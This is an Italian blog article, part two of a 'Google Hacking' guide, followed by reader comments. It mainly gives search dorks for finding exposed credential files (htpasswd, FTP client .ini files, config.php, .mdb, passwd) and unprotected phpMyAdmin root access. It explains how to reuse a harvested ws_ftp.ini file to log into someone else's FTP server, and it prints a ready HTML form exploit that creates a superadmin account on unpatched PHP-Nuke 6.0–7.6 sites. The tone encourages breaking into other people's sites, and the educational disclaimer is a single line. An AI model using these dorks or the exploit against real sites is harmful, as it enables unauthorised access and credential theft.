Google Hacking e Guida all’uso – Parte seconda
Eccoci alla seconda parte de “Google Hacking e Guida all’uso” , una serie di articoli che vogliono sottolineare la scarsa sicurezza in italia prendendo come esempio il piu’ grande e famoso motore di ricerca al mondo, Google, utilizzandolo come strumento per verificare la sicurezza dei siti web.
Nella prima parte (consiglio vivamente di leggerla prima di proseguire, clicca qui) abbiamo discussi di :
- Servizi base ed operatori avanzati di Google
- Introduzione alla parte pratica (hacking)
- Google Hacking: Pratica (I)
In questa seconda parte invece, discuteremo dei seguenti argomenti:
- Server e Siti Vulnerabili
- Applicare Exploit e conoscenze a Google
- Vari Exploit
- Approfondimento alle GoogleDorks e una particolare lista che vi dimostrerà come anche vostro cugino di 3 anni possa accedere a delle password private.Se vi è piaciuto l’articolo , votate OK nella barra qui in basso e dateci qualche stellina cosi’ da capire se l’articolo è stato gradito. Commenti sono ben accetti ovviamente e vi risponderemo prontamente.
Una volta in grado di trovare determinati tipi di server, non ci risulterà difficile ricercare server vulnerabili a qualche exploit da poter testare.
Prima di tutto, cos’è un exploit?
Tratto da Wikipedia
“Un exploit è un termine usato in informatica per identificare un metodo che, sfruttando un (informatica)”>bug o una vulnerabilità, porta all’acquisizione di privilegi o al denial of service di un computer.
Ci sono diversi modi per classificare gli exploit. Il più comune è una classificazione a seconda del modo in cui l’exploit contatta l’applicazione vulnerabile. Un exploit remoto è compiuto attraverso la rete e sfrutta la vulnerabilità senza precedenti accessi al sistema. Un exploit locale richiede un preventivo accesso al sistema e solitamente fa aumentare i privilegi dell’utente oltre a quelli impostati dall’amministratore.
Gli exploit possono anche essere classificati a seconda del tipo di vulnerabilità che sfruttano. Vedi buffer overflow, Heap Overflow, format string attacks, race condition, double free(), Integer overflow, sql injection, cross-site scripting e cross-site request forgery.
Lo scopo di molti exploit è quello di acquisire i privilegi di root su un sistema. È comunque possibile usare exploit che dapprima acquisiscono un accesso con i minimi privilegi e che poi li alzano fino ad arrivare a root.
Normalmente un exploit può sfruttare solo una specifica falla e quando è pubblicato questa falla è riparata e l’exploit diventa obsoleto per le nuove versioni del programma. Per questo motivo alcuni blackhat hacker non divulgano gli exploit trovati ma li tengono riservati per loro o per la loro comunità. Questi exploit sono chiamati zero day exploit, e scoprire il loro contenuto è il più grande desiderio per gli attacker senza conoscenze, altrimenti detti script kiddie.”
In pratica, un exploit è un codice o un programma (o una serie di click in questo caso) che ci permettono di ricevere informazioni sensibili (password, nomi utente etc..) o l’accesso di un determinato sistema.
Grazie a Google siamo in grado di trovare una cascata di siti vulnerabil e di seguito verranno trattati alcuni esempi.
Ad esempio, se siamo venuti a conoscenza di un dato exploit possiamo sfruttare Google per ricercare siti vulnerabili a questo exploit.
Se ad sempio dobbiamo trovare un sito che abbia PhpNuke Installato, possiamo inserire varie stringhe :
“Welcome to PHP-Nuke” congratulations
Cosi’ facendo cercheremo tutti i siti che hanno ancora la pagina iniziale di installaizone di phpNuke.Di solito questa pagina viene cancellata subito dopo l’installazione, ma molti administrator dimenticano la pagina sui server. (anche perchè forse, si scocciano di continuare a costruire il sito).
Scrivendo questo invece, avremo un’altra lunga lista di siti fatti in phpnuke.
Se vogliamo un login di phpmyadmin o cercare un phpmyadmin non protetto da password, possiamo scrivere:
intitle:phpMyAdmin “Welcome to phpMyAdmin ***” “running on * as root@*”
Con questa stringa siamo capaci invece di trovare siti che ospitano questo tipo di servizio per il controllo dei loro database. Però noi, non stiamo cercando solamente un login PhpMyAdmin, in quanto sarebbe bastato scrivere intitle:phpMyAdmin “Welcome to phpMyAdmin” mentre noi abbiamo scritto anche “running on * as root@*”. Questo vuol dire che stiamo cercando anche tutti i siti che non hanno protetto il loro servizio con una password e che quindi ci danno l’accesso root.
Altra GoogleDork datata ma attualmente funzionante è la seguente:
Vi elenco una piccola lista di GoogleDorks adatte per la ricerca dei server
“Powered by: vBulletin Version 1.1.5″
“Powered by Gallery v1.4.4″
“Online Store - Powered by ProductCart”
“inurl:search.php vbulletin”
“powered by openbsd” +”powered by apache”
“intitle:”Page rev */*/*” inurl:”admin”
Questa è solo un assaggio di quello che è possibile cercare e trovare con Google.
Applicare Exploit e conoscenze a Google (Ovvero come entrare nei siti?)
Prenderemo in esempio exploit che sono ormai datati (ma che continuano a funzionare =).
Ovviamente tutto quello che conosciamo lo possiamo trasformare in una stringa di ricerca di Google che ci renderà semplicissime le operazioni di hacking.
Se ,ad esempio, noi sappiamo che un dato exploit ha come oggetto un file INI di Ws_Ftp, metteremo nella ricerca di Google:
Cosi’ diremo al motore di ricerca di trovare tutti i file con estenzione INI che abbiano inizio con ws_ftp. Quindi come risultato avremo una serie di siti che ci daranno la password di FTP criptata.
In questo caso ci basterà installare anche noi questo programma (magari una versione non recentissima) , e copiare il contenuto del file INI all’interno del nostro file ini presente nella cartella. Cosi’ facendo non dovremo piu’ decriptare la password, ma semplicemente selezionare il sito e collegarci.
Un’altro programma Ftp che fa uso dei file ini è flashFXP. Anche questo programma salve le password dei siti web in modo criptato (molto semplice).
filetype:ini inurl:flashFXP.ini
Il risultato saranno dei file .INI con nomi utente, password ed indirizzi di connessione. Fare Hacking non è mai stato cosi’ facile.
Ci sono svariati modi per prelevare password grazie a Google, ve ne ho dato largo esempio e potetesempre trovare altre stringhe e crearne delle nuove per testare la sicurezza del web. Di seguito vi elencherò’ una serie di opzioni da poter utilizzare nella ricerca password:
intitle:”Index of” master.passwd
Con questa ricerca avremo i file Master Password da poter leggere. Questi file sono di un importanza maggiore rispetto
ad un file Passwd o Shadow in quanto contiene , appunto, le MASTER password, le chiavi di tutto il sito. Spesso anche
in questo file le password non saranno quelle vere.
filetype:conf inurl:psybnc.conf “USER.PASS=”
intitle:”index of” trillian.ini
Password criptate del famoso trillian :)
Sempre per quanto riguarda le password abbiamo varie combinazioni da provare. Le password le possiamo trovare anche in archivi, in database, in file.
Esempi:
intitle:”Index of” “.htpasswd” htpasswd.bak
Con questo , cercheremo la directory chiamata “.htpasswd” che contenga il file htpasswd.bak (file in cui possiamo trovare password criptate facilmente cracckabili).Dopo la ricerca, avremo molti risultati e cliccando si qualcuno e cliccando ancora sul file Htpasswd, potremo avere davanti una lista simile:
TWikiGuest:
BartMassey:
AndrewGreenberg:
MickThomure:
TedHavelka:hpf8d.jR4TSXY
DonWolfe:A4Oex7qv2rF9w
Nelle ultime due righe vediamo i nomiutente e le password in modo criptato.
Queste informazioni non dovrebbero essere di dominio pubblico ma come avete potuto vedere, basta un click e il gioco è fatto.
Come tutti ben sappiamo, moli servizi una volta installati presentano all’interno della loro cartella di installazione un file chiamato “config.php”. Questo file , spesso e volentieri, contiene le password di accesso a siti, ad ftp,a database e a quanto altro possa servire il file in questione.
Una strada veloce per ricercare questi file è la seguente:
Come abbiamo visto anche in precedenza, noi siamo capaci di ricercare un dato file di password.Per quanto riguarda le password di Frontpage possiamo usare la seguente espressione:
ext:pwd inurl:(service | authors | administrators | users) “# -FrontPage-”
cosi’ andremo a ricercare i file password contenenti almeno uno di quei campi:
La password(criptata) in questo caso è visibile anche senza aprire il file. Questo non è l’unico metodo per trovare le password di fronpage, ma è uno dei più veloci e validi, un alternativa sarebbe quella di cercare i file .pwd che spesso, sono associati a fronpage (in quanto estenzione password di windows, e pochi programmi usano questo tipo di file, uno dei queli è fronpage).
I metodi più semplici di ricerca password sono:
inurl:passlist.txt
inurl:password.txt
inurl:pass.txt
inurl:pwd.txt
con questa stringa ricercheremo tutti i file .Txt (spesso qualcuno chiama il file delle password con
questi semplici nomi, ingari del fatto che sono alla portata di tutti).
Ovviamente le password le possiamo trovare anche in alcuni archivi (es: mdb). Quindi possiamo cercare alcuni file Mdb per trovare delle pwd nel loro interno.Possiamo cercare:
allinurl: admin mdb
inurl:admin.mdb filetype:mdb
inurl:password filetype:mdb
Per quanto riguarda i file contenenti password, questi possono essere trovati sempre grazie a Google.Infatti se noi sappiamo di un qualche file che contenga password lo possiamo ricercare attraverso questo magico motore di ricerca. Nel caso citato precedentemente, noi andiamo a ricercare file Mdb, ma possiamo benissimo cercare moltissimi tipi di fili, come quelli XLS (Excel), i quali possono contenere interi archivi di password (se siamo fortunati..mooolto fortunati).
Non c’è limite nella ricerca di un qualsiasi file privato, basta solo sapere qual’è il file e ricercarlo, niente di più semplice.
I File delle password li possiamo trovare anche in cartelle di backup che possiamo ricercare cosi’:
inurl:backup intitle:index.of inurl:admin
Exploit Numero I : Come Creare un admin in PHP-NUKE 6.0 a 7.6 (non patchata)
Php-nuke è un portale usato da molissimi utenti in quanto rende facile la creazione e la gestione di un sito con un interfaccia abbastanza professionale.
Ci sono moltissimi bug che riguardano le versioni dalla 6.0 alla 7.6, noi ne analizzeremo uno in particolare.
L’exploit di cui stiamo parlanto usa una tecnica chiamata XSS (Cross Site Scripting). Lo scopo di questa tecnica è di passare informazioni modificate al server. Infatti nel momento in cui noi andiamo a creare una registrazione in Php-nuke automaticamente veniamo creati come utenti normali.
Invece con un semplice codice in Html , siamo capaci di diventare amministratori del sistema.
La prima cosa da fare, è cercare dei siti da testare, quindi apriamo il nostro Google e cerchiamo i siti aventi Php-Nuke 6.0 o superiore:
o cerchiamo un comando simile (in modo da cercare siti con questo portale).
Questo exploit funziona solo sulle versione non Patchate di Php-Nuke.
Una volta trovati i siti vulnerabili a questo tipo di attacco, possiamo passare alla prossima fase, quella di trovare la pagina di amministrazione (di solito http://ilsitophpnuke/admin.php).
Se il nostro sito una volta aperto (e quindi una volta che vediamo la pagina di index) è del tipo:
http://www.pippopaperinopluto.com/portale/index.php
allora per la pagina di amministrazione basterà cambiare “index.php” con “admin.php”. Spesso è possibile accedere alla pagina di amministrazione anche dal sito stesso in quanto possiamo trovare un collegamento a codesta pagina.
Altre volte però l’amministratore potrebbe cambiare la pagina di admin e nasconderla agli’occhi di tutti. Questo, però, capita raramente.
In ogni caso, una volta vista la pagina di amministrazione e controllato che la versione del php sia tra quelle vulnerabili, dobbiamo creare una pagina html con il seguente codice:
<form name=”mantra” method=”POST” action=”http://sitophpnuke/admin.php”>
<p>USERNAME:
<input type=”text” name=”add_aid”>
<br>
NOME:
<input type=”text” name=”add_name”>
<br>
PASSWORD:
<input type=”text” name=”add_pwd”>
<br>
E-MAIL:
<input type=”text” name=”add_email”>
<br>
<input type=”hidden” name=”admin” value=”eCcgVU5JT04gU0VMRUNUIDEvKjox”>
<br>
<input type=”hidden” name=”add_radminsuper” value=”1″>
<br>
<input type=”hidden” name=”op” value=”AddAuthor”>
</p>
<p>
<input type=”submit” name=”Submit” value=”Create Admin”>
<br>
</p>
</form>
Creata la pagina html, dobbiamo sostituire “http://sitophpnuke/admin.php” (che si trova nella prima riga) con l’url completa della pagina di amministrazione.
Poi salviamo la pagina html, la apriamo e compiliamo tutti i campi:
Quindi, inseriremo un Username (l’user con cui verrà creato l’amministratore) , un Nome, una password per accedere all’account e una mail (che può anche non essere vera). Clicchiamo su “Create Admin” e possiamo avere un esito diverso a seconda del phpnuke installato sul sito.
Una volta cliccato, si caricherà automaticamente la pagina di amministrazione, se questa viene caricata , possiamo inserire username e password precedentemente inseriti e cercare di entrare come amministratori.
Viceversa, possiamo anche trovarci di fronte ad un portale patchato , quindi avremo un messaggio di errore definito dall’amministratore di quel portale o addirittura possiamo essere bannati dal sito. Se l’exploit funziona, saremo amministratori del sistema e quindi i padroni del sito (ora potete anche fare una risata malefica).
Questo è solo un esempio di quello che possiamo fare ma , parlando in generale, è possibile usare Google per ricercare i siti vulnerabili di un exploit che conosciamo.
Approfondimento alle GoogleDorks
Eccovi una lista di GoogleDorks che anche un bambino di 3 anni potrebbe utilizzare (proprio per la loro facilità)
allinurl: admin mdb (Password all’interno di file MDB)
inurl:admin.mdb filetype:mdb (Password all’interno di file MDB)
inurl:password filetype:mdb (Password all’interno di file MDB)
inurl:passlist.txt (Password all’interno di file di testo)
inurl:password.txt (Password all’interno di file di testo)
inurl:pass.txt (Password all’interno di file di testo)
inurl:pwd.txt (Password all’interno di file di testo)
“login: *” “password= *” filetype:xls (Password in file XLS)
intitle:”Index of” spwd.db passwd -pam.conf (Password nei file conf e db)
inurl:config.php dbuname dbpass (file di configurazione di un database da php)
Siamo giunti alla conclusione anche di questa seconda parte de Google HACKING.
Vi ricordo che tutte le informazioni soprariportate sono solo ed esclusivamente a scopo didattico e non per incentivare le azioni illegali. Se vi è piaciuto l’articolo , supportarci votandoci e lasciando commenti, cosi’ da poter inserire in seguito altri articoli simili.
Puoi votare l'articolo anche qui, gli articoli precedenti qui.
27 Responses to “Google Hacking e Guida all’uso – Parte seconda”
Leave a Reply
Google Hacking e Guida all’uso – Parte seconda | Hitech-Point.it
Eccoci alla seconda parte de “Google Hacking e Guida all’uso” , una serie di articoli che vogliono sottolineare la scarsa sicurezza in italia prendendo come esempio il piu’ grande e famoso motore di ricerca al mondo, Google, utilizzandolo come …
BELLIXIMO VERAMENTE… MA NN HO KAPITO UNA COSA… UNA VOLTA TROVATA LA NOSTRA ADMIN.PHP come faccio ad inserire la mia index.htm dove posso inserire nome e pass per registrarmi come amministratore…. per favore aiutatemi…
devi modificare l’url da codice (se ho capito la domanda) :)
GRAZIE MA ANKORA NN RIESCO A CAPIRE BENE
CIE’ DOVREI APRILE LA PAG ADMIN.PHP E CON IL DESTRO DEL MOUSE VISUALIZZARE IL CODICE SORGENTE, POI CAMBIARE L’URL E SALVARLO
ma cosi’ facendo non la salva la pag nel suo sito…..
PLEASE HELP ME
CMQ CONTINUALA QUESTA GIUDA XKE’ E’ STRAORDINARIA
ASPETTO TUE NOTIZIE
KAKKIO ORA HO KAPITO…. LEGGENDO BENE LA GUIDA HO CAPITO GRAZIE… SE HO QUALKE ALTRO DUBBIO SCRIVERO’ ANKORA
Grazie Axel per il supporto prima di tutto. Sicuramente continueremo le nostre guide a riguardo di questa bellissima materia in quanto è giusto che si diffonda anche questo tipo di conoscenze sempre e solo a scopo didattico ovviamente.
OVVIO IO HO TANTA SETE DI IMPARARE E A DIRE KE MI SN DIPLOMATO IN INFORMATIKA.. MA SOLO IN QUESTI FORUM CM IL TUO SI RIESCE AD IMPARARE BENE… SAPPI KE X QUALSIASI AIUTO IO CI SARO’ ANKE SE PENSO K NE HO PIU’ IO DI BISOGNO… CIAO CIAO
ciao sn ankora io, senti ma una volta trovata una pag cn file dove il nome utente e pass sono criptate come le decripto.. io sto usando CAIN ma nn lo so usare ankora tanto bene.. tu sapresti aiutarmi??? grazie anticipata
Dipende da come sono criptate le password, a volte puoi usare anche altri exploit senza dover decriptare nulla.
quali exploit tipo????? me ne indikeresti uno
E’ triste vedere guide come queste online.
Nulla da ridire, anzi, complimenti, è fatta bene. Ma se pensiamo un attimo a tutti coloro che tempo fa passavano notti, e giorni, a cercare una maledettissima variabile non controllata! Ed il tutto senza il grande G!
Si certo, ci si evolve, è un “nuovo hacking”, ma siamo sicuri che si puo parlare di hacking? Io credo che questo tipo di attacchi siano come delle bravate… come i teppisti distruggono e imbrattano i muri, nè più nè meno.
Lo studio approfondito ( senza rincoglionirsi davanti al pc ) è ciò che serve per poter riconoscere un bug senza nessun video tutorial o guida come questa!
L’unico pro di guide come queste è che magari i sysadministrators si rendano conto di cosa significhi “sicurezza” ed inizi a lavorare davvero!
Morale? Studiare l’hacking, non queste stro**** che non portano altro che denuncie =)
Manuali e manuali di tutti i linguaggi possibili! Di tutti i SO! E tanto altro… Troppo difficile? Allora non permettetevi a dire che siete degli “hacker”!
0z_m0s1s
oz_mosis
è giusto il tuo commento nei riguarda di questa Guida che non fa altro che sottolineare gli aspetti piu’ commerciali della sicurezza informatica.
Non siamo un blog di hacking ovviamente, ma cerchiamo di spiegare in grosse linee come sia pericolosa la rete oggi.
Purtroppo non possiamo sapere chi legge l’articolo e sappiamo sicuramente che molti che lo trovano sui motori di ricerca, forse, non ne faranno un Buon uso.
Sei il benvenuto nel caso tu voglia scrivere qualcosa nei riguardi della questione da te sollevata.
Speriamo che ci siano piu’ denunce possibili :D
Luca Hitech-point.it
@admin
Non credo si parli solo di aspetti commerciali visto che sono presenti dorks importanti e ancora ampiamente sfruttabili!
Gli attacchi per chi ne capisce un minimo sono ben descritti e inducono, per esempio, un dodicenne alle prime armi nel campo a testare queste vulnerabilità possibilmente su qualche server importante. E qui subentra il buon senso! Ma possiamo parlarne nel caso di “poveri” adolescenti vittime dell’overload informativo indotto loro da internet?
Un tempo, ma anche adesso, si parlava di Ethical Hacking e credo che sia l’argomento principale di chiunque voglia entrare nell’immenso mondo dell’ “ITC security”.
Non sono denunce le mie, ma solamente dei pensieri che voglio rendere pubblici per vedere se esiste ancora qualcuno che pensando all’informazione libera e alla potenza di Internet sobbalzi almeno un minimo…
0z_m0s1s
oz_mosis
L’informazione è un arma a doppio taglio purtroppo. Noi forniamo informazioni pubbliche su fatti che devono essere conosciuti, su come ci sia poca sicurezza all’interno del web (che è in costante aumento). Negli articoli che trattano Google in particolare, non abbiamo analizzato le ultime tecniche ma ci siamo limitati nell’analisi di dorks ed exploit datati almeno da 2, 3 anni.
Le tue considerazioni sono giuste ma l’informazione è necessaria.
Per qualsiasi cosa contattaci anche via mail.
E’ proprio per evitare qqueste cose che il mio sito è scritto intermante da me ed è in prevalenza in php supercontrollato.
http://www.goodfiles.altervista.org
sono appassionato di g.h sto facendo un prog. presto gratis ul mio sito
A quanto pare ci sono molti programmini che sfruttano questi hack. :)
Bellissimo!! visto che ci siete, adesso non so se è stato già fatto, potete parlare un po dei proxy? e su come usarli? grazie.
Hallo, ich bin neu hier!
War Ihr Lesung Bord fu”r eine Weile, und jetzt im registriert) hoffe, ich bin hier willkommen.
Pandemonium und Happy Day!:))
ps: Entschuldigung fu”r meine schlechte Sprache – ich bin noch Lernen)
Salve ragazzi diciamo che me la cavo in questa materia, ma l’importante è che mi piaccia, e diaciamo che mi sto facendo il c**o per studiare questa bellissima materia, trovo molto interessante questa guida, evidenzia sicuramente come il web sia una porta aperta a tutti, e spero un giorno di diventare un hacker, sarà dura lo so, spero di riuscirci, ma vorrei chiedere solo una cosa… come si ci diventa veramente hacker?? E dico veri hacker, non quelli che non capiscono nulla e provano a fare attacchi al vento oppure attacchi semplificati come le dork di google. Diciamo gli hacker detti anche come “Le vecchie guardie”. Se mi rispondeste mi farebbe molto piacere, grazie e complimenti per la guida, anche per la sintassi e la spiegazione.
Joseph
domanda da un milione di dollari direi… hacker non ha un significato psicologico e fine a se stesso. L’importante è studiare :)
grazie per il commento e .. buono studio!
Luca Hitech-point.it
Grazie per la risposta, ma esattamente non intendevo questo… diciamo che di questo ne ero al corrente XD .
La mia domanda a questo punto diventa… se non si frequenta una scuola specifica, allora come seguire un piano di studi?? A casaccio studiando le cose che più piacciono, oppure seguire un diretto piano di “studi” ??
Mi sa tanto che bisogna dire… tanta pazienza e vedrò che le cose inizieranno a “verificarsi” XD.
Però non so come dirlo, per me gli hacker sono come dei miti, e un giorno vorrei essere come loro, ma potenzialmente… sai com’è.. non ho voglia di finire in carcere XD XD XD.
Grazie ancora per la risposta.
Distinti saluti Joseph.